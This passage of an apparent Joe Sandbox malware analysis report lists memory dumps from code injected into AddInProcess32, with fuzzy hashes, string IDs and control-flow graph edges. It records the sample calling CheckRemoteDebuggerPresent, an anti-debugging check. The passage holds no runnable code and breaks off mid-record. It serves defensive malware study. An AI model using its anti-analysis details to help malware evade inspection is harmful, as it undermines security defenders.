                    • Opcode Fuzzy Hash: ecffd04703fbc1f6f976c9fe555db04346a50cf0928eab3ddd3e125b48eac43b
                    • Instruction Fuzzy Hash: 0F124D30A00215CFDB29DFA9C854BAEB7F2BF85300F24856AD509AB365DB749D85CF84
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: e180eba8951c0464a746b611ed54713261901b3dbe66e0a7f84391c6051f755e
                    • Instruction ID: 714abc0da94f10bd1b0acde8d5fcea15fe07ad5d2931d43d3ec03c465da5c89f
                    • Opcode Fuzzy Hash: e180eba8951c0464a746b611ed54713261901b3dbe66e0a7f84391c6051f755e
                    • Instruction Fuzzy Hash: B4B13F30A00214DFDB19EF64D6957AEB7B2EF84300F64C56AD409AB355DBB9DC82CB84
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.479109392.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_470000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: LRp$LRp$$p$$p
                    • API String ID: 0-727438728
                    • Opcode ID: c6a9839afe186440dde0ca4d800af33d70970f6a5b7d3ce82a14f7a213abff4e
                    • Instruction ID: 5e2d8d82534e02570f6581894c2a7013a629a628b26b653aa2de107815067688
                    • Opcode Fuzzy Hash: c6a9839afe186440dde0ca4d800af33d70970f6a5b7d3ce82a14f7a213abff4e
                    • Instruction Fuzzy Hash: BD51B171B00201DFCB18EB68D591BAE77E2FF84300F54866AD4099B356DB75EC41CB95

                    Execution Graph

                    Execution Coverage:11.5%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 12890 2c5308 12891 2c534c CheckRemoteDebuggerPresent 12890->12891 12892 2c538e 12891->12892

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 695 451d60-451d7e 696 451d80-451d83 695->696 697 451d85-451da1 696->697 698 451da6-451da9 696->698 697->698 699 451dab-451dc5 698->699 700 451dca-451dcd 698->700 699->700 701 451dcf-451dd9 700->701 702 451dda-451ddd 700->702 705 451df4-451df6 702->705 706 451ddf-451ded 702->706 707 451dfd-451e00 705->707 708 451df8 705->708 712 451e06-451e1c 706->712 713 451def 706->713 707->696 707->712 708->707 715 451e22-451e2b 712->715 716 452038-452042 712->716 713->705 717 451e31-451e4e 715->717 718 452043-45207f 715->718 725 452025-452032 717->725 726 451e54-451e7c 717->726 721 452081-452084 718->721 723 4520a7-4520aa 721->723 724 452086-4520a2 721->724 727 452157-45215a 723->727 728 4520b0-4520bc 723->728 724->723 725->715 725->716 726->725 749 451e82-451e8b 726->749 729 452390-452392 727->729 730 452160-45216f 727->730 735 4520c7-4520c9 728->735 732 452394 729->732 733 452399-45239c 729->733 745 452171-45218c 730->745 746 45218e-4521d2 730->746 732->733 733->721 736 4523a2-4523ab 733->736 739 4520e1-4520e5 735->739 740 4520cb-4520d1 735->740 743 4520e7-4520f1 739->743 744 4520f3 739->744 741 4520d5-4520d7 740->741 742 4520d3 740->742 741->739 742->739 748 4520f8-4520fa 743->748 744->748 745->746 755 452364-45237a 746->755 756 4521d8-4521e9 746->756 750 452111-45214a 748->750 751 4520fc-4520ff 748->751 749->718 753 451e91-451ead 749->753 750->730 775 45214c-452156 750->775 751->736 762 452013-45201f 753->762 763 451eb3-451edd 753->763 755->729 765 45234f-45235e 756->765 766 4521ef-45220c 756->766 762->725 762->749 778 451ee3-451f0b 763->778 779 452009-45200e 763->779 765->755 765->756 766->765 777 452212-452309 766->777 826 452317 777->826 827 45230b-452315 777->827 778->779 785 451f11-451f3f 778->785 779->762 785->779 791 451f45-451f4e 785->791 791->779 792 451f54-451f86 791->792 800 451f91-451fad 792->800 801 451f88-451f8c 792->801 800->762 803 451faf-452007 800->803 801->779 802 451f8e 801->802 802->800 803->762 828 45231c-45231e 826->828 827->828 828->765 829 452320-452325 828->829 830 452327-452331 829->830 831 452333 829->831 832 452338-45233a 830->832 831->832 832->765 833 45233c-452348 832->833 833->765
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 5df835e152e3f3f479344b313298fdbdd7cfea210642974f7ddf9f6ae2118ce9
                    • Instruction ID: a9d2344dc5a440247329b6461026024112966cdf4818916d7b24c44f79b3d861
                    • Opcode Fuzzy Hash: 5df835e152e3f3f479344b313298fdbdd7cfea210642974f7ddf9f6ae2118ce9
                    • Instruction Fuzzy Hash: 3402DE30B002058FCB15DF74D9947AEB7E2EF85301F24842AD8059B396DB79ED8ACB94
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a95d284af883e8e8647d59d2c2ddde6dd031481608c416422cb523fa582bee1
                    • Instruction ID: edea468d3eb47027ff451cefc12b40b41b3d00c662c027df03b5dbd10ff96e47
                    • Opcode Fuzzy Hash: 1a95d284af883e8e8647d59d2c2ddde6dd031481608c416422cb523fa582bee1
                    • Instruction Fuzzy Hash: 4962B238B002048FDB15DB68D594BAEB7F2EF88311F54846AD805DB396DB39ED4ACB44

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 451070-45108c 136 45108e-451091 135->136 137 4510b4-4510b6 136->137 138 451093-4510af 136->138 139 4510bd-4510c0 137->139 140 4510b8 137->140 138->137 139->136 141 4510c2-4511dd 139->141 140->139 161 4511df-4511e3 141->161 162 4511e9-4511f8 141->162 161->162 163 451656-451660 162->163 164 4511fe-451207 162->164 165 45120d-451218 164->165 166 45164c-451651 164->166 167 451626-451632 165->167 168 45121e-451235 165->168 166->163 167->164 170 451638 167->170 168->167 172 45123b-451244 168->172 170->163 172->166 173 45124a-45126f 172->173 176 451275-45128c 173->176 177 451614-451620 173->177 176->177 179 451292-45129b 176->179 177->167 177->172 179->166 180 4512a1-4512bb 179->180 182 4512c2-4512c4 180->182 183 4512c6-4512d6 182->183 184 45130e-451321 182->184 189 451326-451359 183->189 190 4512d8-4512e8 183->190 185 4515f0-4515f4 184->185 186 4515f6 185->186 187 4515ff-451600 185->187 186->187 187->177 199 45139b-4513ab 189->199 200 45135b-451399 189->200 190->189 194 4512ea-4512fa 190->194 194->189 197 4512fc-45130c 194->197 197->184 197->189 204 4513c3-4513d8 199->204 205 4513ad-4513b3 199->205 210 4513da-451441 200->210 204->210 206 4513b5 205->206 207 4513b7-4513b9 205->207 206->204 207->204 219 451447-45144a 210->219 220 4514f3-451513 210->220 221 4515d1-4515d6 219->221 222 451450-451460 219->222 229 451515-451556 220->229 230 45156b-451577 220->230 231 4515db-4515ee 221->231 227 451466-4514bb 222->227 228 4514e9-4514ed 222->228 227->221 254 4514c1-4514db 227->254 228->219 228->220 229->221 252 451558-451569 229->252 235 45158f-4515a4 230->235 236 451579-45157f 230->236 231->185 244 4515a6-4515cf 235->244 238 451581 236->238 239 451583-451585 236->239 238->235 239->235 244->231 252->244 254->221 257 4514e1-4514e7 254->257 257->220
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: 74f26809676088a0162da1c5e9d93ba5cc31261a66be8c8ce9b3cadf4126f1cc
                    • Instruction ID: 2a11bce1955145dcf8c32e053c52fbbc4447bde969fe1df0667dbae0fea62a27
                    • Opcode Fuzzy Hash: 74f26809676088a0162da1c5e9d93ba5cc31261a66be8c8ce9b3cadf4126f1cc
                    • Instruction Fuzzy Hash: 06F14C70A00208CFDB19EFA5D494B6EB7B2EF84301F288569D8059B369DB35DC86CF95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 835 453130-45316a 836 453190-4531ae 835->836 837 45316c-45318b 835->837 841 4531c6-4531dc 836->841 842 4531b0-4531b8 836->842 837->836 846 4531e7-4531e9 841->846 842->841 847 453201-453272 846->847 848 4531eb-4531f3 846->848 858 453274-453297 847->858 859 45329e-4532ba 847->859 848->847 858->859 864 4532e6-453301 859->864 865 4532bc-4532df 859->865 870 453303-453325 864->870 871 45332c-453347 864->871 865->864 870->871 876 453372-453a71 871->876 877 453349-45336b 871->877 877->876
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: f074168e500240c060346c9857c0587f7cfdaa9464e8de52f8652c9dd4cefab6
                    • Instruction ID: 7a4baf865abe8cf7ec1df3d4a5d222ac32ba0aee884b60beb77428477193de67
                    • Opcode Fuzzy Hash: f074168e500240c060346c9857c0587f7cfdaa9464e8de52f8652c9dd4cefab6
                    • Instruction Fuzzy Hash: 2A517F34B006098FDB54DF78D8A4BAE73F6EB84342F14846AD806EB389EA34DD45CB54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 968 2c5308-2c538c CheckRemoteDebuggerPresent 970 2c538e-2c5394 968->970 971 2c5395-2c53d0 968->971 970->971
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002C537F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484886578.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2c0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: 4336db2b01d3ae146631dea451da9701758224c2ea8d4c29632ef2c9936d9a70
                    • Instruction ID: ab827947c71e9b92bc619a1f37af0a266b55f0ded50fa4337f076e5e3c45bd3f
                    • Opcode Fuzzy Hash: 4336db2b01d3ae146631dea451da9701758224c2ea8d4c29632ef2c9936d9a70
                    • Instruction Fuzzy Hash: F62128B1C002598FCB00CF9AD484BEEFBF4AF49320F15845AE855A7250D778A944CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 974 454f30-454f49 975 454f4b-454f4e 974->975 976 454f50-454f54 975->976 977 454f5b-454f5e 975->977 978 454f56 976->978 979 454f99-454fa2 976->979 980 454f80-454f83 977->980 981 454f60-454f71 977->981 978->977 984 454fa8-454fae 979->984 985 45507b-455085 979->985 982 454f85-454f8f 980->982 983 454f90-454f93 980->983 1054 454f73 call 454f20 981->1054 1055 454f73 call 454f30 981->1055 983->979 987 455086-455089 983->987 988 454fb4-454fd3 984->988 989 4550c8-4550fd 984->989 990 4550ac-4550ae 987->990 991 45508b-4550a7 987->991 1004 45506c-455075 988->1004 1005 454fd9-455014 988->1005 999 4550ff-455102 989->999 994 4550b5-4550b8 990->994 995 4550b0 990->995 991->990 993 454f79-454f7b 993->980 994->975 998 4550be-4550c7 994->998 995->994 1001 45525e-455261 999->1001 1002 455108-45512e 999->1002 1006 455284-455286 1001->1006 1007 455263-45527f 1001->1007 1019 455135-455163 1002->1019 1004->984 1004->985 1023 455016-455019 1005->1023 1024 45501e-455028 1005->1024 1008 45528d-455290 1006->1008 1009 455288 1006->1009 1007->1006 1008->999 1011 455296-45529f 1008->1011 1009->1008 1033 455165-45516f 1019->1033 1034 4551da-4551fe 1019->1034 1023->998 1024->1004 1027 45502a-45503e 1024->1027 1031 455040-45504a 1027->1031 1032 45504c 1027->1032 1036 455051-455053 1031->1036 1032->1036 1040 455187-4551d8 1033->1040 1041 455171-455177 1033->1041 1045 455200 1034->1045 1046 455208 1034->1046 1037 455055-455058 1036->1037 1038 45505f-45506a 1036->1038 1037->1038 1038->1004 1038->1027 1040->1033 1040->1034 1043 455179 1041->1043 1044 45517b-45517d 1041->1044 1043->1040 1044->1040 1045->1046 1046->1001 1054->993 1055->993
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: 5caea2da0609cff6c813d3e5357e7641c2be61699d15bf3fea1f93caa7cd92ed
                    • Instruction ID: 8d00738b6f66381fafc8093a79d328366fb3d95a49a9f133752c2a949701ea9b
                    • Opcode Fuzzy Hash: 5caea2da0609cff6c813d3e5357e7641c2be61699d15bf3fea1f93caa7cd92ed
                    • Instruction Fuzzy Hash: 20812631B005048FCF149B78E4647BEBBA2EBC4715F24846AD802DB386DB39DD4ACB95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1128 452050-45207f 1129 452081-452084 1128->1129 1130 4520a7-4520aa 1129->1130 1131 452086-4520a2 1129->1131 1132 452157-45215a 1130->1132 1133 4520b0-4520bc 1130->1133 1131->1130 1134 452390-452392 1132->1134 1135 452160-45216f 1132->1135 1139 4520c7-4520c9 1133->1139 1137 452394 1134->1137 1138 452399-45239c 1134->1138 1149 452171-45218c 1135->1149 1150 45218e-4521d2 1135->1150 1137->1138 1138->1129 1140 4523a2-4523ab 1138->1140 1143 4520e1-4520e5 1139->1143 1144 4520cb-4520d1 1139->1144 1147 4520e7-4520f1 1143->1147 1148 4520f3 1143->1148 1145 4520d5-4520d7 1144->1145 1146 4520d3 1144->1146 1145->1143 1146->1143 1151 4520f8-4520fa 1147->1151 1148->1151 1149->1150 1156 452364-45237a 1150->1156 1157 4521d8-4521e9 1150->1157 1152 452111-45214a 1151->1152 1153 4520fc-4520ff 1151->1153 1152->1135 1171 45214c-452156 1152->1171 1153->1140 1156->1134 1163 45234f-45235e 1157->1163 1164 4521ef-45220c 1157->1164 1163->1156 1163->1157 1164->1163 1172 452212-452309 1164->1172 1195 452317 1172->1195 1196 45230b-452315 1172->1196 1197 45231c-45231e 1195->1197 1196->1197 1197->1163 1198 452320-452325 1197->1198 1199 452327-452331 1198->1199 1200 452333 1198->1200 1201 452338-45233a 1199->1201 1200->1201 1201->1163 1202 45233c-452348 1201->1202 1202->1163
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: b3b27fbd603206e90b0b55446e37929548a73de41b2c3891e4221055c0489918
                    • Instruction ID: 3a553346877f5a71ae2817184668ebe995893870233f40fc0186f17badafff43
                    • Opcode Fuzzy Hash: b3b27fbd603206e90b0b55446e37929548a73de41b2c3891e4221055c0489918
                    • Instruction Fuzzy Hash: 531159317012089BCB248E31EA402BBBB65EB82312F14846BCE05D7382D6B4DC8EC754
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57bfca0bb384202d6251cd59daf7a59af68a34844ff840782c536f58d7b1d022
                    • Instruction ID: 20987414b6fb964874c030ebb7166a5563927664f08913f6c09834fdc46eafff
                    • Opcode Fuzzy Hash: 57bfca0bb384202d6251cd59daf7a59af68a34844ff840782c536f58d7b1d022
                    • Instruction Fuzzy Hash: 3C815C70601204CFDB19EFA5D894B5EB7B2EF84305F688629D8059B399CB35EC86CF94
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e1a32e452052f8c802f450e5f80e367b4d8e2680b539cde3ed8beb0af511ae7
                    • Instruction ID: 8e747e762c2b5ef238c2aac77e6b91ebbc9de7a81cd5e73772292b1044c83c23
                    • Opcode Fuzzy Hash: 5e1a32e452052f8c802f450e5f80e367b4d8e2680b539cde3ed8beb0af511ae7
                    • Instruction Fuzzy Hash: C121F635B011059BCF14DB68E5547AEB7F6EF84311F15842AD805EB382D735EC898B84
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484846050.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_27d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b619b5a0b7554e8b61d6ddfa36b62cbb637272c6cfc42a7132123adb0ca5ab6e
                    • Instruction ID: d34fc777bba55473ccaadc318721a1ddef69759a4e2fe60575a9988c7910390b
                    • Opcode Fuzzy Hash: b619b5a0b7554e8b61d6ddfa36b62cbb637272c6cfc42a7132123adb0ca5ab6e
                    • Instruction Fuzzy Hash: EA21D075614240EFDB15CF24D884B26BB71EF84314F24C569E84D4B246C376D86BCBA1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ab2809bc43d11b8dedd192c5a069bb8cee458a286164f4faf8b7d0705f5631d
                    • Instruction ID: 122a0f1e09a686b12fe3dba27721bd45dbe8a3a2560cc591f1c042615ecc49e5
                    • Opcode Fuzzy Hash: 3ab2809bc43d11b8dedd192c5a069bb8cee458a286164f4faf8b7d0705f5631d
                    • Instruction Fuzzy Hash: EF21C874A00209CBDB10DF94D594AAEB7B2FF48316F248156DC11A7366D734AC8ACF54
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 69892983dfcc63ef503c33e0b7672eab7c5634c67523dcb366a07b9133b17616
                    • Instruction ID: 845735876d0298ebf6fbcdc9ca310b1ac521663b05e6b1f68725b6fb1b95c816
                    • Opcode Fuzzy Hash: 69892983dfcc63ef503c33e0b7672eab7c5634c67523dcb366a07b9133b17616
                    • Instruction Fuzzy Hash: 0621D635B001089BCF14DBA9E5547AEB7F7EF84311F148426D805EB381DB35EC898B84
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484846050.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_27d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6e5dcc966e1d172207713b2f37ede3874ef400a1b7c9e854048bc315396bdb4
                    • Instruction ID: d79cfb9253e8d36c2827ae432636c3802f840abc6e8923132d7d92c970bc9c90
                    • Opcode Fuzzy Hash: e6e5dcc966e1d172207713b2f37ede3874ef400a1b7c9e854048bc315396bdb4
                    • Instruction Fuzzy Hash: 67218B755093808FDB02CF24D994B15BF71EF46314F28C5EAD8498F6A7C33A981ACB62
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29ed63130888be98b6751b7414e18aa3e5581a179bdffc98c6f54649ef071393
                    • Instruction ID: e4e67531d9304a9f91f850002bc683f00df4c7d319300520bfa32641d1ed0c8f
                    • Opcode Fuzzy Hash: 29ed63130888be98b6751b7414e18aa3e5581a179bdffc98c6f54649ef071393
                    • Instruction Fuzzy Hash: F501283570065A5BD722A639E40532F3786EBD1355F15083EE445CB356DA64CD4F4784
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 382b0387b2c7592ac3d97957c7abc669864b25c57396b772ed91c674f4f7e3f2
                    • Instruction ID: 7a107dea9faa1d5105a3dfaac6f324faae3c1a4415105c2dfeac99f64a956d13
                    • Opcode Fuzzy Hash: 382b0387b2c7592ac3d97957c7abc669864b25c57396b772ed91c674f4f7e3f2
                    • Instruction Fuzzy Hash: DC01A4307001145BDB65EB7CE85472F73D9EBC9715F108839E90BCB355DA25DC8A8794
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: beb060aad061f8d812bc189b38bc399e3e52d8c704468b07882c39e08e370073
                    • Instruction ID: e14576b50579985ea74c0567eea71b5f048eaaf57a03285472e16853e67fca4c
                    • Opcode Fuzzy Hash: beb060aad061f8d812bc189b38bc399e3e52d8c704468b07882c39e08e370073
                    • Instruction Fuzzy Hash: 06F0FC36B041049FDF20DABCF89879B7BA1D7C432AF10453BE905DB346C6349C588691
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-1868313790
                    • Opcode ID: 23a49f810ada6455048a05d35141264a073d9b8afdaf678799a72ce34c8fc423
                    • Instruction ID: 9d9d51f4d02ddd954a06e2e9c31ae799b2e5454e40acc5063d6117ea1b8fc164
                    • Opcode Fuzzy Hash: 23a49f810ada6455048a05d35141264a073d9b8afdaf678799a72ce34c8fc423
                    • Instruction Fuzzy Hash: 81125F30A00219CFDB29DF69D844BAEB7B2BF85301F24856AD40AAB365DB35DD85CF44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: 397fd85eb59c14295de5a3abe1ea72b503ab9f33b16b39c912ffef69fa2adb6b
                    • Instruction ID: dc05f1c845abe2ab27b692ad7a8a6506b13f5af9e3cc106ebdc98203b19381be
                    • Opcode Fuzzy Hash: 397fd85eb59c14295de5a3abe1ea72b503ab9f33b16b39c912ffef69fa2adb6b
                    • Instruction Fuzzy Hash: 05B17130A10218CFCB18DF64D59476EB7B2EF89301F64C52AD8059B356DB79DC86CB84
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.484988555.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_450000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: LRp$LRp$$p$$p
                    • API String ID: 0-727438728
                    • Opcode ID: d0532827051afad8b35f9fa771d324ebbcc0669775956205660d96a5a944dcbe
                    • Instruction ID: 0e85d4ef6846583926487e791378669f9f13b75ecb1db52f39ebee731649328f
                    • Opcode Fuzzy Hash: d0532827051afad8b35f9fa771d324ebbcc0669775956205660d96a5a944dcbe
                    • Instruction Fuzzy Hash: 7E51CF707002019FCB18EB68D945B6EB7A2FF89301F14896AE8059B3A6DB75EC49CB54

                    Execution Graph

                    Execution Coverage:12.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 16878 1c5308 16879 1c534c CheckRemoteDebuggerPresent 16878->16879 16880 1c538e 16879->16880

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 258 481d60-481d7e 259 481d80-481d83 258->259 260 481d85-481da1 259->260 261 481da6-481da9 259->261 260->261 262 481dca-481dcd 261->262 263 481dab-481dc5 261->263 264 481dda-481ddd 262->264 265 481dcf-481dd9 262->265 263->262 267 481ddf-481ded 264->267 268 481df4-481df6 264->268 275 481e06-481e1c 267->275 276 481def 267->276 270 481df8 268->270 271 481dfd-481e00 268->271 270->271 271->259 271->275 278 482038-482042 275->278 279 481e22-481e2b 275->279 276->268 280 481e31-481e4e 279->280 281 482043-48207f 279->281 288 481e54-481e7c 280->288 289 482025-482032 280->289 284 482081-482084 281->284 285 482086-4820a2 284->285 286 4820a7-4820aa 284->286 285->286 290 4820b0-4820bc 286->290 291 482157-48215a 286->291 288->289 312 481e82-481e8b 288->312 289->278 289->279 298 4820c7-4820c9 290->298 293 482390-482392 291->293 294 482160-48216f 291->294 295 482399-48239c 293->295 296 482394 293->296 304 48218e-4821d2 294->304 305 482171-48218c 294->305 295->284 300 4823a2-4823ab 295->300 296->295 302 4820cb-4820d1 298->302 303 4820e1-4820e5 298->303 307 4820d3 302->307 308 4820d5-4820d7 302->308 309 4820f3 303->309 310 4820e7-4820f1 303->310 318 4821d8-4821e9 304->318 319 482364-48237a 304->319 305->304 307->303 308->303 311 4820f8-4820fa 309->311 310->311 316 4820fc-4820ff 311->316 317 482111-48214a 311->317 312->281 314 481e91-481ead 312->314 324 482013-48201f 314->324 325 481eb3-481edd 314->325 316->300 317->294 339 48214c-482156 317->339 329 48234f-48235e 318->329 330 4821ef-48220c 318->330 319->293 324->289 324->312 341 482009-48200e 325->341 342 481ee3-481f0b 325->342 329->318 329->319 330->329 338 482212-482309 330->338 389 48230b-482315 338->389 390 482317 338->390 341->324 342->341 348 481f11-481f3f 342->348 348->341 354 481f45-481f4e 348->354 354->341 355 481f54-481f86 354->355 363 481f88-481f8c 355->363 364 481f91-481fad 355->364 363->341 365 481f8e 363->365 364->324 366 481faf-482007 364->366 365->364 366->324 391 48231c-48231e 389->391 390->391 391->329 392 482320-482325 391->392 393 482333 392->393 394 482327-482331 392->394 395 482338-48233a 393->395 394->395 395->329 396 48233c-482348 395->396 396->329
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 699d1503bf1cfa603a1419e7fd7df623e12a2781c1245f98def4e0d60e52db0d
                    • Instruction ID: bb88a1c50aa3c7d822966b981059080021287d6372ca253cd65637ff787905d5
                    • Opcode Fuzzy Hash: 699d1503bf1cfa603a1419e7fd7df623e12a2781c1245f98def4e0d60e52db0d
                    • Instruction Fuzzy Hash: A902A030B002059FCB15EB74D69476EB7E2EF85304F24886AD805AB395DB79DD86CB84
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5d733abd6d3481c0148ba167dc85bdcba933d7b9c1d31a677d73ce975a91619
                    • Instruction ID: d9cd3badaa6db3232c1c62737e73129941c446cbef15d4cd58a6fbd5a39a7e77
                    • Opcode Fuzzy Hash: f5d733abd6d3481c0148ba167dc85bdcba933d7b9c1d31a677d73ce975a91619
                    • Instruction Fuzzy Hash: 7A62C534B102048FDB64EB68D594BAEB7F2EF84314F14886AD405EB365DB39ED46CB44

                    Control-flow Graph

                    • Executed
                    • Not Executed
